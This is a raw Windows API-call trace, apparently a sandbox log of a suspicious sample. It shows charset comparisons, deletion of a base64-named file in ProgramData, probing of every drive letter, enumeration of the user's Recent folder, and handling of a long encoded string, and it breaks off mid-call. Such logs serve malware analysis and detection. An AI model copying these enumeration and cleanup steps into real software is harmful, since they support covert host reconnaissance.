[0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-87", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0208", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 3 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_X0208-1983", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO87JISX0208", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-88", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88Greek7", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASMO_449", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_9036", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arabic7", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-89", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO89ASMO449", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-90", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO90", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-a", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-91", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-a", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO91JISC62291984a", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-92", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP-OCR-B", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO92JISC62991984b", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b-add", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-93", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b-add", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO93JIS62291984badd", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-94", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO94JIS62291984hand", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand-add", cchCount1=23, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-95", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand-add", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO95JIS62291984handadd", cchCount1=25, lpString2="UTF-8", cchCount2=5) returned 1 [0105.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-kana", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-96", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO96JISC62291984kana", cchCount1=23, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_2033-1983", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-98", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e13b", cchCount1=4, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2033", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.110-1983", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-99", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_T500-1983", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAPLPS", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO99NAPLPS", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1:1987", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-100", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin1", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l1", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM819", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP819", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin1", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-2:1987", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-101", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin2", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l2", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin2", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61-7bit", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-102", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO102T617bit", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61-8bit", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61", cchCount1=4, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-103", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO103T618bit", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-3", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-3:1988", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-109", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] CloseHandle (hObject=0x3d0) returned 1 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.973] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] ResetEvent (hEvent=0x3f4) returned 1 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.974] GetCurrentThreadId () returned 0x1358 [0105.975] ResetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] SetEvent (hEvent=0x3f8) returned 1 [0105.975] SetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] ResetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] ResetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] SetEvent (hEvent=0x3f8) returned 1 [0105.975] SetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] ResetEvent (hEvent=0x3f4) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] ResetEvent (hEvent=0x3f4) returned 1 [0105.975] CloseHandle (hObject=0x3f4) returned 1 [0105.975] CloseHandle (hObject=0x3f8) returned 1 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.975] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] GetCurrentThreadId () returned 0x1358 [0105.976] DeleteFileW (lpFileName="C:\\ProgramData\\TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=" (normalized: "c:\\programdata\\tvpssuq5nke4otzfmzjfx19uyxjpacgxnibnyxj0idiwmjagugf6yxj0zxnpkv9fu2fhdcgxms00mc01osk=")) returned 1 [0105.983] GetFileAttributesW (lpFileName="A:\\" (normalized: "a:")) returned 0xffffffff [0105.983] GetLastError () returned 0x3 [0105.988] GetFileAttributesW (lpFileName="B:\\" (normalized: "b:")) returned 0xffffffff [0105.991] GetLastError () returned 0x3 [0105.996] GetFileAttributesW (lpFileName="D:\\" (normalized: "d:")) returned 0xffffffff [0105.997] GetLastError () returned 0x3 [0106.003] GetFileAttributesW (lpFileName="E:\\" (normalized: "e:")) returned 0xffffffff [0106.003] GetLastError () returned 0x3 [0106.009] GetFileAttributesW (lpFileName="F:\\" (normalized: "f:")) returned 0xffffffff [0106.009] GetLastError () returned 0x3 [0106.016] GetFileAttributesW (lpFileName="G:\\" (normalized: "g:")) returned 0xffffffff [0106.016] GetLastError () returned 0x3 [0106.022] GetFileAttributesW (lpFileName="H:\\" (normalized: "h:")) returned 0xffffffff [0106.023] GetLastError () returned 0x3 [0106.030] GetFileAttributesW (lpFileName="I:\\" (normalized: "i:")) returned 0xffffffff [0106.030] GetLastError () returned 0x3 [0106.036] GetFileAttributesW (lpFileName="J:\\" (normalized: "j:")) returned 0xffffffff [0106.306] GetLastError () returned 0x3 [0106.312] GetFileAttributesW (lpFileName="K:\\" (normalized: "k:")) returned 0xffffffff [0106.312] GetLastError () returned 0x3 [0106.318] GetFileAttributesW (lpFileName="L:\\" (normalized: "l:")) returned 0xffffffff [0106.319] GetLastError () returned 0x3 [0106.323] GetFileAttributesW (lpFileName="M:\\" (normalized: "m:")) returned 0xffffffff [0106.324] GetLastError () returned 0x3 [0106.328] GetFileAttributesW (lpFileName="N:\\" (normalized: "n:")) returned 0xffffffff [0106.328] GetLastError () returned 0x3 [0106.332] GetFileAttributesW (lpFileName="O:\\" (normalized: "o:")) returned 0xffffffff [0106.333] GetLastError () returned 0x3 [0106.338] GetFileAttributesW (lpFileName="P:\\" (normalized: "p:")) returned 0xffffffff [0106.338] GetLastError () returned 0x3 [0106.342] GetFileAttributesW (lpFileName="Q:\\" (normalized: "q:")) returned 0xffffffff [0106.342] GetLastError () returned 0x3 [0106.346] GetFileAttributesW (lpFileName="R:\\" (normalized: "r:")) returned 0xffffffff [0106.419] GetLastError () returned 0x3 [0106.424] GetFileAttributesW (lpFileName="S:\\" (normalized: "s:")) returned 0xffffffff [0106.424] GetLastError () returned 0x3 [0106.428] GetFileAttributesW (lpFileName="T:\\" (normalized: "t:")) returned 0xffffffff [0106.428] GetLastError () returned 0x3 [0106.433] GetFileAttributesW (lpFileName="U:\\" (normalized: "u:")) returned 0xffffffff [0106.433] GetLastError () returned 0x3 [0106.437] GetFileAttributesW (lpFileName="V:\\" (normalized: "v:")) returned 0xffffffff [0106.437] GetLastError () returned 0x3 [0106.441] GetFileAttributesW (lpFileName="W:\\" (normalized: "w:")) returned 0xffffffff [0106.442] GetLastError () returned 0x3 [0106.446] GetFileAttributesW (lpFileName="X:\\" (normalized: "x:")) returned 0xffffffff [0106.446] GetLastError () returned 0x3 [0106.451] GetFileAttributesW (lpFileName="Y:\\" (normalized: "y:")) returned 0xffffffff [0106.451] GetLastError () returned 0x3 [0106.455] GetFileAttributesW (lpFileName="Z:\\" (normalized: "z:")) returned 0xffffffff [0106.536] GetLastError () returned 0x3 [0106.536] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=8, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned 1 [0106.537] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent")) returned 0x11 [0106.537] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=8, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned 1 [0106.537] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9fcfcd57, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fcfcd57, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0106.537] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9fcfcd57, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9fcfcd57, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.537] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f80461, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74f80461, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x74f80461, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4fd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="0VlS.lnk", cAlternateFileName="")) returned 1 [0106.537] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0106.537] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0VlS.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\0vls.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74f80461, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74f80461, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x74f80461, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4fd)) returned 1 [0106.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 